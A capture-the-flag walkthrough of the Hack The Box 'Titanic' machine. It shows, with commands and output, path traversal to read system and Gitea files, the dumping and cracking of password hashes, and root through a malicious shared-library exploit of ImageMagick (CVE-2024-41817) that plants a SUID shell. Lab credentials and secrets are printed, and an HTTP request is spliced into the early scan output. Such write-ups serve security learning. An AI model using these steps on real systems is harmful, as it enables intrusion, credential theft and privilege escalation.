Titanic
2025-07-01 10:01
Status: Solved
Difficulty: Easy
Titatic - HTB
Enumeration
Port scan shows us that this is possibly a simple web server with the host name of titanic.htb.
nmap
> nmap -sV 10.10.11.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 09:56 CEST
Nmap scan report for 10.10.11.55
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.32 seconds
ffuf
Let's see what directories we can find with ffuf
ffuf -u http://titanic.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://titanic.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
book [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 71ms]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 31ms]
:: Progress: [4727/4727] :: Job [1/1] :: 579 req/sec :: Duration: [0:00:09] :: Errors: 0 ::
Not too much to see here, but maybe the book endpoint gives us something. The 405 code means the request was given with wrong method, this is probably because it's open for POST requests, instead of GET requests.
Let's fuzz the subdomains now
> ffuf -u http://10.10.11.55 -H "Host: FUZZ.titanic.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.11.55
:: Wordlist : FUZZ: /usr/share/wordlistsGET /download?ticket=/etc/hosts HTTP/1.1
Host: titanic.htb
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titanic.htb/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.titanic.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
dev [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 43ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1298 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
Looks like dev.titanic.htb also serves some content. This worked because we can enumerate for virtual hosts giving ffuf the Host: FUZZ.titanic.htb
header. Put dev.titanic.htb
into /etc/hosts
so we can see the web page.
titanic.htb
First let's see titanic.htb
.
Looking at the website's landing page we can already see this booking form which sends the booking information to the /book
endpoint. After filling the form with dummy information, I get a response in which I get redirected to a GET request pointing to /download?ticket=d4f5e956-39a2-42af-9c69-5da5ea2ff739.json
ticket.
This endpoint seems like an attack surface but I have no clue yet what could be exploitable.
dev.titanic.htb
Next up, looking at the dev.titanic.htb
we see a Gitea instance. There are 2 repositories uploaded here: docker-config
for the Gitea instance and flask-app
for the flask application we saw on the titanic.htb
domain.
The docker-config
repo contains some sensitive information inside it's mysql/docker-compose.yml
file:
version: '3.8'
services:
mysql:
image: mysql:8.0
container_name: mysql
ports:
- "127.0.0.1:3306:3306"
environment:
MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
MYSQL_DATABASE: tickets
MYSQL_USER: sql_svc
MYSQL_PASSWORD: sql_password
restart: always
We have a root password for a mysql database, but we cannot connect it to yet, because we don't have a foothold and this service only accepts connections from localhost.
Furthermore we can see the source code of the flask application we've been seeing on the titanic.htb.
The landing page on the /
route:
@app.route('/')
def index():
return render_template('index.html')
The /book
endpoint which is responsible for getting the form data and creating the ticket:
@app.route('/book', methods=['POST'])
def book_ticket():
data = {
"name": request.form['name'],
"email": request.form['email'],
"phone": request.form['phone'],
"date": request.form['date'],
"cabin": request.form['cabin']
}
ticket_id = str(uuid4())
json_filename = f"{ticket_id}.json"
json_filepath = os.path.join(TICKETS_DIR, json_filename)
with open(json_filepath, 'w') as json_file:
json.dump(data, json_file)
return redirect(url_for('download_ticket', ticket=json_filename))
Last but not least the /download
endpoint which give us the ticket json.
@app.route('/download', methods=['GET'])
def download_ticket():
ticket = request.args.get('ticket')
if not ticket:
return jsonify({"error": "Ticket parameter is required"}), 400
json_filepath = os.path.join(TICKETS_DIR, ticket)
if os.path.exists(json_filepath):
return send_file(json_filepath, as_attachment=True, download_name=ticket)
else:
return jsonify({"error": "Ticket not found"}), 404
One crucial line here to pay attention to is the ```
json_filepath = os.path.join(TICKETS_DIR, ticket)
So why is this important? First we need to understand how the os.path.join
function works
>>> import os
>>> os.path.join("tickets", "ticket.json")
'tickets/ticket.json'
The result is what we would expect. Since we control the ticket parameter and there is no input sanitation, we could try giving ticket a value of ../../../../etc/passwd
or something like that, but there is an easier way to do path traversal here. If os.path.join
second parameter starts with /
, then the method will completely ignore what was the first parameter.
>>> os.path.join("tickets", "/etc/passwd")
'/etc/passwd'
Let's try this out on the /download
endpoint. First let's open up Burp Suite, then intercept the request after using the form on the web page. Modifying the ticket
parameter with /etc/passwd
:
GET /download?ticket=/etc/passwd HTTP/1.1
Host: titanic.htb
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titanic.htb/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
The response gives us the proof of concept, that indeed, we can do path traversal with this implementation.
HTTP/1.1 200 OK
Date: Tue, 01 Jul 2025 11:15:32 GMT
Server: Werkzeug/3.0.3 Python/3.10.12
Content-Disposition: attachment; filename="/etc/passwd"
Content-Type: application/octet-stream
Content-Length: 1951
Last-Modified: Fri, 07 Feb 2025 11:16:19 GMT
Cache-Control: no-cache
ETag: "1738926979.4294043-1951-393413677"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslogbinded:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
From this we can see that there is a developer user with a home directory.
Shell as developer
Trying the path traversal with /home/developer/user.txt
, we get the user flag. Doing the same thing with /root/root.txt
doesn't seem to work so, we definitely have to get a foothold on this machine.
We can take a look at gitea once again. In the docker-config
repo, we can see that gitea is running inside a docker container and its /data
volume is bound to the /home/developer/gitea/data
directory. Using our read access exploit, we should have a read of the config file of gitea.
According to the documentation of gitea:
Customization files described here should be placed in
/data/gitea
directory. If using host volumes, it's quite easy to access these files; for named volumes, this is done through another container or by direct access at/var/lib/docker/volumes/gitea_gitea/_data
. The configuration file will be saved at/data/gitea/conf/app.ini
after the installation.
With this knowledge, and with the information in the docker-compose.yml
we found in the gitea repo we can try and read this conf file.
curl 'http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini'
and the response:
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod
RUN_USER = git
WORK_PATH = /data/gitea
[repository]
ROOT = /data/git/repositories
[repository.local]
LOCAL_COPY_PATH = /data/gitea/tmp/local-repo
[repository.upload]
TEMP_PATH = /data/gitea/uploads
[server]
APP_DATA_PATH = /data/gitea
DOMAIN = gitea.titanic.htb
SSH_DOMAIN = gitea.titanic.htb
HTTP_PORT = 3000
ROOT_URL = http://gitea.titanic.htb/
DISABLE_SSH = false
SSH_PORT = 22
SSH_LISTEN_PORT = 22
LFS_START_SERVER = true
LFS_JWT_SECRET = OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4
OFFLINE_MODE = true
[database]
PATH = /data/gitea/gitea.db
DB_TYPE = sqlite3
HOST = localhost:3306
NAME = gitea
USER = root
PASSWD =
LOG_SQL = false
SCHEMA =
SSL_MODE = disable
[indexer]
ISSUE_INDEXER_PATH = /data/gitea/indexers/issues.bleve
[session]
PROVIDER_CONFIG = /data/gitea/sessions
PROVIDER = file
[picture]
AVATAR_UPLOAD_PATH = /data/gitea/avatars
REPOSITORY_AVATAR_UPLOAD_PATH = /data/gitea/repo-avatars
[attachment]
PATH = /data/gitea/attachments
[log]
MODE = console
LEVEL = info
ROOT_PATH = /data/gitea/log
[security]
INSTALL_LOCK = true
SECRET_KEY =
REVERSE_PROXY_LIMIT = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8
PASSWORD_HASH_ALGO = pbkdf2
[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW = false
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost
[lfs]
PATH = /data/git/lfs
[mailer]
ENABLED = false
[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true
[cron.update_checker]
ENABLED = false
[repository.pull-request]
DEFAULT_MERGE_STYLE = merge
[repository.signing]
DEFAULT_TRUST_MODEL = committer
[oauth2]
JWT_SECRET = FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g
We see a lot of stuff which can be leveraged (like the JWT_SECRET), but the key here is the database. Since we have a read access, and the gitea volume is bound to the host system, we can get a hold of this db. To do that we can do the same as before, just with the db path.
curl 'http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db' --output gitea.db
After this we can use the sqlite3
CLI tool to open up this badboy, sqlite3 gitea.db
just like this.
In sqlite3
we can list the tables of the db with the .tables
command, but if we are not sure we can always use the .help
command to list all the available commands. After we list the tables. we see that gitea stores a bunch of stuff.
sqlite> .tables
access oauth2_grant
access_token org_user
action package
action_artifact package_blob
action_run package_blob_upload
action_run_index package_cleanup_rule
action_run_job package_file
action_runner package_property
action_runner_token package_version
action_schedule project
action_schedule_spec project_board
action_task project_issue
action_task_output protected_branch
action_task_step protected_tag
action_tasks_version public_key
action_variable pull_auto_merge
app_state pull_request
attachment push_mirror
auth_token reaction
badge release
branch renamed_branch
collaboration repo_archiver
comment repo_indexer_status
commit_status repo_redirect
commit_status_index repo_topic
commit_status_summary repo_transfer
dbfs_data repo_unit
dbfs_meta repository
deploy_key review
email_address review_state
email_hash secret
external_login_user session
follow star
gpg_key stopwatch
gpg_key_import system_setting
hook_task task
issue team
issue_assignees team_invite
issue_content_history team_repo
issue_dependency team_unit
issue_index team_user
issue_label topic
issue_user tracked_time
issue_watch two_factor
label upload
language_stat user
lfs_lock user_badge
lfs_meta_object user_blocking
login_source user_open_id
milestone user_redirect
mirror user_setting
notice version
notification watch
oauth2_application webauthn_credential
oauth2_authorization_code webhook
Out of all this, let's start with the user
table, maybe we can crack the hashes inside it, and we can gain access to the developer
account through SSH. We can use a very basic SQL query to dump the data, SELECT * FROM user;
.
sqlite> .headers on
sqlite> select * from user;
id|lower_name|name|full_name|email|keep_email_private|email_notifications_preference|passwd|passwd_hash_algo|must_change_password|login_type|login_source|login_name|type|location|website|rands|salt|language|description|created_unix|updated_unix|last_login_unix|last_repo_visibility|max_repo_creation|is_active|is_admin|is_restricted|allow_git_hook|allow_import_local|allow_create_organization|prohibit_login|avatar|avatar_email|use_custom_avatar|num_followers|num_following|num_stars|num_repos|num_teams|num_members|visibility|repo_admin_change_team_access|diff_view_style|theme|keep_activity_private
1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0
2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0
We see administrator and developer users here! Get the name, password hash and salt in a cleaner format.
sqlite> select name, passwd, salt from user;
name|passwd|salt
administrator|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|2d149e5fbd1b20cf31db3e3c6a28fc9b
developer|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|8bf3e3452b78544f8bee9400d6936d34
We need to crack these, and for that we can use hashcat
. From the previous dump we know that Gitea uses the pbkdf2$50000$50
algorithm, where the 50000 suggest the number of iterations. On the hashcat example site we see that hashcat will require the sha256:1000:MTc3MTA0MTQwMjQxNzY=:PYjCU215Mi57AYPKva9j7mvF4Rc5bCnt
format for the PBKDF2-HMAC-SHA256 algo, so basically sha256:<iterations>:<salt in base64>:<hash in base64>
. We neet to transform our output to this format which is not trivial but also nothing serious using shell scripting:
sqlite3 gitea.db "select passwd, salt, name from user" | while read line; do digest=$(echo $line | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo $line | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $line | cut -d'|' -f3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hash
We could have done that manually, but we love automatization. So the output is:
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
Let's feed this into hashcat.
hashcat gitea.hash /usr/share/wordlists/rockyou.txt --username
After a minute or so we see that out of 2 passwords, we already cracked 1
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528
The password is 25282528
and it belongs to the user developer
. We also have developer user on the target machine so let's try it out on SSH. Aaaaaaand it works :). We have access to the developer user.
The user.txt is there, if we haven't collected it, with our path traversal.
Shell as root
There was nothing interesting in the users home directory, and only this user has a home directory on this machine. After some manual traversing, I stumbled upon the /opt
directory.
developer@titanic:/opt$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Feb 7 10:37 .
drwxr-xr-x 19 root root 4096 Feb 7 10:37 ..
drwxr-xr-x 5 root developer 4096 Feb 7 10:37 app
drwx--x--x 4 root root 4096 Feb 7 10:37 containerd
drwxr-xr-x 2 root root 4096 Feb 7 10:37 scripts
The app
dir contains the flask application we've been looking at. However the scripts
dir holds an interesting bash script.
developer@titanic:/opt$ cat scripts/identify_images.sh
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log
This script seems to write image metadata with Image Magick to a metadata.log file.
developer@titanic:/opt$ cat /opt/app/static/assets/images/metadata.log
/opt/app/static/assets/images/luxury-cabins.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 280817B 0.000u 0:00.003
/opt/app/static/assets/images/entertainment.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 291864B 0.000u 0:00.000
/opt/app/static/assets/images/home.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 232842B 0.000u 0:00.000
/opt/app/static/assets/images/exquisite-dining.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 280854B 0.000u 0:00.000
Also we can deduce from the metadata.log's time of change information that this script practically runs every minute, so there might be a cronjob behind it.
developer@titanic:/opt$ ls -l /opt/app/static/assets/images/metadata.log; sleep 50; ls -l /opt/app/static/assets/images/metadata.log
-rw-r----- 1 root developer 442 Jul 2 20:38 /opt/app/static/assets/images/metadata.log
-rw-r----- 1 root developer 442 Jul 2 20:39 /opt/app/static/assets/images/metadata.log
It's obvious we have to find a way to exploit magick
.
ImageMagick
developer@titanic:/opt/app/static/assets/images$ magick -version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)
Looking for a CVE for the ImageMagick 7.1.1.-35, a quick search gives us a POC for the CVE-2024-41817. The exploit uses the bug in the compiled Magick 7.1.1 version, where Magick runs in a way where it includes the current working directory, as a path to look for shared libraries and configuration files. This makes it possible to run arbitrary code, inside of Magick if we control the directory where Magick is being run. The POC introduced 2 methods, but I only managed to get the second one working.
developer@titanic:/opt/app/static/assets/images$ cat poc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("id");
exit(0);
}
The cronjob runs Magick in the opt/app/static/assets/images
directory, so I copied the POC from the link above there.
gcc -x c -shared -fPIC -o ./libxcb.so.1 poc.c
Compile the POC
into a shared library.
developer@titanic:/opt/app/static/assets/images$ magick /dev/null /dev/null
uid=1000(developer) gid=1000(developer) groups=1000(developer)
Running magick
with the POC
confirms the vulnerability.
developer@titanic:/opt/app/static/assets/images$ cat poc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("cp /bin/bash /tmp/v41k0 && chmod +s /tmp/v41k0");
exit(0);
}
Instead of running id
, we need run the usual command, whenever we want to get root shell, but not in the process of Magick. This way we will have a bash
binary with the effective SUID
set to root.
We need to compile the code again, the same way we did before and then wait for the cronjob to run.
After the cronjob ran, we can use our modifed /bin/bash
in /tmp/v41k0
, and then we have a root shell, in which we can read the root flag, with the challenge coming to an end.
developer@titanic:/opt/app/static/assets/images$ /tmp/v41k0 -p
v41k0-5.1# id
uid=1000(developer) gid=1000(developer) euid=0(root) egid=0(root) groups=0(root),1000(developer)
v41k0-5.1# cat /root/root.txt
******************148d3
v41k0-5.1#